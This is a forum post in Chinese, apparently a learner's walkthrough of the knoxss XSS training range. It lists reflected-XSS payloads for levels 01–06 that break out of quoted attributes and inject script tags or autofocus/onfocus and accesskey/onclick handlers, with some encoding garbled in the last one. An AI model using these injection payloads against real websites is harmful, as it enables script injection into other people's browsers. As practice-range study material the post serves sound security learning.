qidao123.com技术社区-IT企服评测·应用市场

标题: XSS靶场实战(工作wuwuwu) [打印本页]
作者: 拉不拉稀肚拉稀    时间: 2025-4-30 12:50
标题: XSS靶场实战(工作wuwuwu)
knoxss

knoxss
Single Reflection Using QUERY of URL

——01




测试标签
  1. <script>alert(666666)</script>
复制代码

——02: "



  1. <h1>test</h1>
复制代码

没有反应,查看源码

现在必要闭合双引号,我计划还是先搞标签
  1. "><h1>test</h1>
复制代码

标签上:
  1. "><script>alert(666666)</script>
复制代码


——03: ’


  1. <h1>test</h1>
复制代码

闭合","被实体编码

'闭合

'>来闭合
  1. '><h1>test</h1>
复制代码

不多的时候:

标签上:
  1. '><script>alert(666666)</script>
复制代码


——04:" + input属性



  1. <h1>test</h1>
复制代码

"闭合

发现"闭合了,但是标签无法被闭合,只能看属性
找到 input 对应的xss属性
  1. <input autofocus onfocus=alert(1)>
复制代码
使用
  1. "autofocus onfocus=alert(1) b="
复制代码

刷新页面就触发!
——05: ’ + input




"闭合

‘闭合

闭合,但是 > 被实体编码
属性
  1. ' autofocus onfocus=alert(1) b="
复制代码
'后面是否有空格 都行

——06

页面看不到

①源码搜索到:

再去前面找到对应的,未来edit as html
②直接搜索也可(ctrl + F)

  1. <h1>test</h1>
复制代码

"闭合

使用属性
  1. " autofocus onfocus=alert(1) b="
复制代码

本身赋值了,没有找到其他属性,找到了也由于 type=“hidden” 搞不了
type="hidden"怎样xss:
ai
欣赏器搜索都没有帮我解决
最靠近成功的方案:
“accesskey=“X”%20οnclick=“alert(6666)”%20b=”
alt+X触发
——07


——08


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 qidao123.com技术社区-IT企服评测·应用市场 (https://dis.qidao123.com/) Powered by Discuz! X3.4